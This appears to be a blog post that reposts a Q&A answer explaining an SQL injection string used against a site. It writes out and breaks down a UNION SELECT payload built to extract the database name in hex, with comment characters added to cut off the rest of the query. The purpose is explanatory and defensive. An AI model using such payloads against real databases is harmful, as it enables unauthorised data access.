Tuesday, 26 June 2018

mysql - Site has been hacked via SQL Injection

This is not the complete query, actually the person entered this string in your web app.




Now, first replace %20 with blank space in the union part, you get:



SELECT concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--


Seems like the user put the string in some place where you were expecting an number. So, you see that first there is a number (999.9) to complete the original condition of the query. Then, an UNION part is added.
Finally, after the UNION part, the comment characters are added (-- ) so that, the rest of the query (which might be being added by your system) is bypassed.



We can format the code for better understanding:




SELECT 
concat
(
0x7e,
0x27,
Hex(cast(database() as char)),
0x27,
0x7e
),

0x31303235343830303536,
0x31303235343830303536,
0x31303235343830303536


Now, substring of the first column of the result will contain the hex encoded form of your datbase name. Actually, it should be surrounded by single quotes (0x27), then again surrounded by ~ (0x7e)

No comments:

Post a Comment

php - file_get_contents shows unexpected output while reading a file

I want to output an inline jpg image as a base64 encoded string, however when I do this : $contents = file_get_contents($filename); print ...